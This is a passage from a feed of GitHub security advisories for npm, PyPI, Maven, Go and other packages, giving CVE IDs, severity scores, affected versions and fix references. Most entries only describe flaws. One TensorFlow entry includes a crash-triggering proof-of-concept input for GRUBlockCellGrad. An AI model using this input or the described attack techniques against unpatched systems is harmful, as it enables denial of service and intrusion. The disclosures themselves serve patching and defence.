[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1712'}, {'type': 'WEB', 'url': 'https://github.com/deepset-ai/haystack/pull/4535'}, {'type': 'WEB', 'url': 'https://github.com/deepset-ai/haystack/commit/5fc84904f198de661d5b933fde756aa922bf09f1'}, {'type': 'PACKAGE', 'url': 'https://github.com/deepset-ai/haystack'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/9a6b1fb4-ec9b-4cfa-af1e-9ce304924829'}]
{'cwe_ids': ['CWE-547'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T22:55:51Z', 'nvd_published_at': '2023-03-30T10:15:00Z'}
1.4.0
GHSA-2x9c-qwgf-94xr
2023-03-28T23:09:13Z
2023-03-28T19:57:57Z
null
['CVE-2022-36060']
matrix-react-sdk Prototype pollution vulnerability
### Impact Events sent with special strings in key places can temporarily disrupt or impede the matrix-react-sdk from functioning properly, such as by causing room or event tile crashes. The remainder of the application can appear functional, though certain rooms/events will not be rendered. ### Patches This is fixed in matrix-react-sdk 3.53.0 ### Workarounds There are no workarounds. Please upgrade immediately. ### References https://learn.snyk.io/lessons/prototype-pollution/javascript/ ### For more information If you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'matrix-react-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.53.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/security/advisories/GHSA-2x9c-qwgf-94xr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-36060'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-react-sdk'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-react-sdk/releases/tag/v3.53.0'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-28T19:57:57Z', 'nvd_published_at': '2023-03-28T21:15:00Z'}
1.4.0
GHSA-q2x3-2f9g-h559
2023-03-31T16:09:20Z
2023-03-23T21:30:18Z
null
['CVE-2023-28333']
Moodle's Mustache pix helper contained a potential Mustache injection risk if combined with user input
The Mustache pix helper contained a potential Mustache injection risk if combined with user input (note: This did not appear to be implemented/exploitable anywhere in the core Moodle LMS).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.20'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28333'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/128c0c21607a71f411611a0104b2a8c858dd6fca'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git;a=commitdiff;h=128c0c21607a71f411611a0104b2a8c858dd6fca'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3QZN34VSF4HTCW3C3ZP2OZYSLYUKADPF/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445065'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:09:12Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
1.4.0
GHSA-h76p-mc68-jv3p
2023-03-17T14:44:28Z
2023-03-10T21:30:19Z
null
['CVE-2023-27901']
Denial of service in Jenkins Core
Jenkins 2.393 and earlier, LTS 2.375.3 and earlier uses the Apache Commons FileUpload library without specifying limits for the number of request parts introduced in version 1.5 for CVE-2023-24998 in org.kohsuke.stapler.RequestImpl, allowing attackers to trigger a denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27901'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27901.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-3030'}]
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:44:28Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
1.4.0
GHSA-mwq8-fjpf-c2gr
2023-03-30T20:19:18Z
2023-03-30T20:19:18Z
null
['CVE-2023-28427']
Prototype pollution in matrix-js-sdk (part 2)
### Impact In certain configurations, data sent by remote servers containing special strings in key locations could cause modifications of the `Object.prototype`, disrupting matrix-js-sdk functionality, causing denial of service and potentially affecting program logic. (This is part 2, where [CVE-2022-36059](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36059) / [GHSA-rfv9-x7hh-xc32](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32) is part 1. Part 2 covers remaining vectors not covered by part 1, found in a codebase audit scheduled after part 1.) ### Patches The issue has been patched in matrix-js-sdk 24.0.0. ### Workarounds None. ### References - [Release blog post](https://matrix.org/blog/2023/03/28/security-releases-matrix-js-sdk-24-0-0-and-matrix-react-sdk-3-69-0) - The advisory [GHSA-rfv9-x7hh-xc32](https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32) ([CVE-2022-36059](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36059)) refers to an initial set of vulnerable locations discovered and patched in matrix-js-sdk 19.4.0. We opted not to disclose that advisory while we performed an audit of the codebase and are now disclosing it jointly with this one. ### For more information If you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'matrix-js-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '24.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-mwq8-fjpf-c2gr'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-js-sdk/security/advisories/GHSA-rfv9-x7hh-xc32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28427'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-js-sdk'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/04/msg00027.html'}, {'type': 'WEB', 'url': 'https://matrix.org/blog/2023/03/28/security-releases-matrix-js-sdk-24-0-0-and-matrix-react-sdk-3-69-0'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-36'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5392'}]
{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:19:18Z', 'nvd_published_at': '2023-03-28T21:15:00Z'}
1.4.0
GHSA-68v3-g9cm-rmm6
2023-03-27T21:26:02Z
2023-03-24T21:53:25Z
null
['CVE-2023-25658']
TensorFlow vulnerable to Out-of-Bounds Read in GRUBlockCellGrad
### Impact Out of bounds read in GRUBlockCellGrad ```python func = tf.raw_ops.GRUBlockCellGrad para = {'x': [[21.1, 156.2], [83.3, 115.4]], 'h_prev': array([[136.5], [136.6]]), 'w_ru': array([[26.7, 0.8], [47.9, 26.1], [26.2, 26.3]]), 'w_c': array([[ 0.4], [31.5], [ 0.6]]), 'b_ru': array([0.1, 0.2 ], dtype=float32), 'b_c': 0x41414141, 'r': array([[0.3], [0.4]], dtype=float32), 'u': array([[5.7], [5.8]]), 'c': array([[52.9], [53.1]]), 'd_h': array([[172.2], [188.3 ]])} ``` ### Patches We have patched the issue in GitHub commit [ff459137c2716a2a60f7d441b855fcb466d778cb](https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-68v3-g9cm-rmm6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25658'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:53:25Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
1.4.0
GHSA-wm8x-php5-hvq6
2023-03-07T20:13:19Z
2023-03-07T20:13:19Z
null
[]
Maligned causes incorrect deallocation
`maligned::align_first` manually allocates with an alignment larger than T, and then uses `Vec::from_raw_parts` on that allocation to get a `Vec<T>`. [`GlobalAlloc::dealloc`](https://doc.rust-lang.org/std/alloc/trait.GlobalAlloc.html#tymethod.dealloc) requires that the `layout` argument must be the same layout that was used to allocate that block of memory. When deallocating, `Box` and `Vec` may not respect the specified alignment and can cause undefined behavior.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'maligned'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tylerhawkes/maligned/issues/5'}, {'type': 'WEB', 'url': 'https://doc.rust-lang.org/std/alloc/trait.GlobalAlloc.html#tymethod.dealloc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tylerhawkes/maligned'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0017.html'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:13:19Z', 'nvd_published_at': None}
1.4.0
GHSA-9qwg-crg9-m2vc
2023-03-24T22:01:29Z
2023-03-24T22:01:29Z
null
[]
`openssl` `SubjectAlternativeName` and `ExtendedKeyUsage::other` allow arbitrary file read
`SubjectAlternativeName` and `ExtendedKeyUsage` arguments were parsed using the OpenSSL function `X509V3_EXT_nconf`. This function parses all input using an OpenSSL mini-language which can perform arbitrary file reads. Thanks to David Benjamin (Google) for reporting this issue.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.7'}, {'fixed': '0.10.48'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1854'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0023.html'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:29Z', 'nvd_published_at': None}
1.4.0
GHSA-9g98-5mj6-f9mv
2023-03-02T23:25:43Z
2023-03-02T23:25:43Z
null
['CVE-2023-0264']
Keycloak vulnerable to user impersonation via stolen UUID code
Keycloak's OpenID Connect user authentication was found to incorrectly authenticate requests. An authenticated attacker who could also obtain a certain piece of info from a user request, from a victim within the same realm, could use that data to impersonate the victim and generate new session tokens.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '21.0.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-9g98-5mj6-f9mv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0264'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/ec8109112e67208c13e13f6d1f8706a5a3ba8d4c'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-0264'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
{'cwe_ids': ['CWE-287', 'CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:25:43Z', 'nvd_published_at': None}
1.4.0
GHSA-fg7x-g82r-94qc
2023-06-06T17:12:32Z
2023-03-31T06:30:15Z
null
['CVE-2023-28756']
Ruby Time component ReDoS issue
A ReDoS issue was discovered in the Time component through 0.2.1 in Ruby through 3.2.1. The Time parser mishandles invalid URLs that have specific characters. It causes an increase in execution time for parsing strings to Time objects. The fixed versions are 0.1.1 and 0.2.2.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'time'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.2.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'time'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28756'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/time'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/time/CVE-2023-28756.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/04/msg00033.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FFZANOQA4RYX7XCB42OO3P24DQKWHEKA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G76GZG3RAGYF4P75YY7J7TGYAU7Z5E2T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WMIOPLBAAM3FEQNAXA2L7BDKOGSVUT5Z/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230526-0004/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/downloads/releases/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2023/03/30/redos-in-time-cve-2023-28756/'}]
{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:43:54Z', 'nvd_published_at': '2023-03-31T04:15:00Z'}
1.4.0
GHSA-5g39-ppwg-6xx8
2023-03-16T18:32:38Z
2023-03-16T18:32:38Z
null
['CVE-2023-28105']
Go-huge-util vulnerable to path traversal when unzipping files
Impact ZipSlip issue when use fsutil package to unzip files. When users use zip.Unzip to unzip zip files from a malicious attacker, they may be vulnerable to path traversal. Patches It has been fixed in v0.0.34, Please upgrade version to v0.0.34 or above. Workarounds No, users have to upgrade version. References
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/dablelv/go-huge-util/zip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.34'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/dablelv/go-huge-util'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.34'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/dablelv/go-huge-util/security/advisories/GHSA-5g39-ppwg-6xx8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28105'}, {'type': 'WEB', 'url': 'https://github.com/dablelv/go-huge-util/commit/0e308b0fac8973e6fa251b0ab095cdc5c1c0956b'}, {'type': 'PACKAGE', 'url': 'https://github.com/dablelv/go-huge-util'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:32:38Z', 'nvd_published_at': '2023-03-16T17:15:00Z'}
1.4.0
GHSA-63f2-6959-2pxj
2023-04-07T21:09:25Z
2023-03-31T12:30:16Z
null
['CVE-2023-1776']
Mattermost vulnerable to cross-site scripting (XSS)
Boards in Mattermost allows an attacker to upload a malicious SVG image file as an attachment to a card and share it using a direct link to the file. [Issue Identifier](https://mattermost.com/security-updates/): MMSA-2023-00139
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.7.2'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.7.0'}, {'fixed': '7.7.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.7.1'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.1.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.8.0'}, {'fixed': '7.8.1'}]}], 'versions': ['7.8.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.39.3'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '7.1.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.10.10'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1776'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost-server'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates/'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:09:25Z', 'nvd_published_at': '2023-03-31T12:15:00Z'}
1.4.0
GHSA-x5j3-mq9g-8jc8
2023-03-22T21:48:43Z
2023-03-17T14:43:35Z
null
['CVE-2023-28106']
Cross-site Scripting (XSS) in UrlSlug Data type
### Impact An attacker can use XSS to send a malicious script to an unsuspecting user. ### Patches Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14669.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/14669.patch manually. ### References https://huntr.dev/bounties/fa77d780-9b23-404b-8c44-12108881d11a
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-x5j3-mq9g-8jc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28106'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14669.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/c59d0bf1d03a5037b586fe06230694fa3818dbf2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fa77d780-9b23-404b-8c44-12108881d11a'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:43:35Z', 'nvd_published_at': '2023-03-16T17:15:00Z'}
1.4.0
GHSA-rqm8-q8j9-662f
2023-03-17T16:59:18Z
2023-03-14T15:30:17Z
null
['CVE-2023-1299']
Nomad Job Submitter Privilege Escalation Using Workload Identity
### Summary A vulnerability was identified in Nomad and Nomad Enterprise (“Nomad”) such that a user with the submit-job ACL capability can submit a job that can escalate to management-level privileges. This vulnerability, CVE-2023-1299, was introduced in Nomad 1.5.0 and fixed in Nomad 1.5.1. ### Background Nomad 1.4.0 introduced the concept of workload identity so that tasks can access variables without needing to access them through Nomad HTTP API with an ACL token. In 1.5.0, the identity block was introduced, which exposes the workload identity token to the workload so it can access Nomad HTTP API via a unix domain socket without configuring mTLS. ### Details During internal testing, we discovered it was possible to abuse the workload identity to elevate to management-level privilege if the workload identity did not have any attached ACL policies. ### Remediation Customers should evaluate the risk associated with this issue and consider upgrading to Nomad 1.5.1 or newer. See Nomad’s Upgrading for general guidance on this process.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}], 'versions': ['1.5.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1299'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-08-nomad-job-submitter-privilege-escalation-using-workload-identity/51389'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T18:02:16Z', 'nvd_published_at': '2023-03-14T15:15:00Z'}
1.4.0
GHSA-rp78-4562-gx3c
2023-03-31T16:23:37Z
2023-03-29T18:30:30Z
2023-03-31T16:23:37Z
[]
Duplicate Advisory: pimcore is vulnerable to cross-site scripting in translate module
## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of [GHSA-hfmg-g39c-5444](https://github.com/advisories/GHSA-hfmg-g39c-5444). This link is maintained ot preserve external references. ## Original Description Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.20.
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1704'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/295f5e8d108b68198e36399bea0f69598eb108a0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/84419c7b-ae29-401b-bdfd-5d0c498d320f'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-30T20:25:08Z', 'nvd_published_at': '2023-03-29T16:15:00Z'}
1.4.0
GHSA-2wmj-8mqg-r9q8
2023-03-13T19:16:03Z
2023-03-07T00:30:26Z
null
['CVE-2021-36397']
Moodle has Incorrect Default Permissions
In Moodle, insufficient capability checks meant message deletions were not limited to the current user.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36397'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424803'}]
{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T00:20:44Z', 'nvd_published_at': '2023-03-06T22:15:00Z'}
1.4.0
GHSA-hjv9-hm2f-rpcj
2023-03-09T04:23:52Z
2023-03-01T18:30:59Z
null
['CVE-2023-0507']
Grafana vulnerable to Cross-site Scripting
Grafana is an open-source platform for monitoring and observability. Starting with the 8.1 branch, Grafana had a stored XSS vulnerability affecting the core plugin GeoMap. The stored XSS vulnerability was possible due to map attributions weren't properly sanitized and allowed arbitrary JavaScript to be executed in the context of the currently authorized user of the Grafana instance. An attacker needs to have the Editor role in order to change a panel to include a map attribution containing JavaScript. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. Users may upgrade to version 8.5.21, 9.2.13 and 9.3.8 to receive a fix.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.1.0'}, {'fixed': '8.5.21'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0507'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-0507/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230413-0001/'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:06:08Z', 'nvd_published_at': '2023-03-01T16:15:00Z'}
1.4.0
GHSA-9crj-hpxh-f6qg
2023-04-03T19:30:03Z
2023-03-27T21:30:25Z
null
['CVE-2023-0241']
pgAdmin 4 vulnerable to directory traversal
pgAdmin 4 versions prior to v6.19 contains a directory traversal vulnerability. A user of the product may change another user's settings or alter the database.
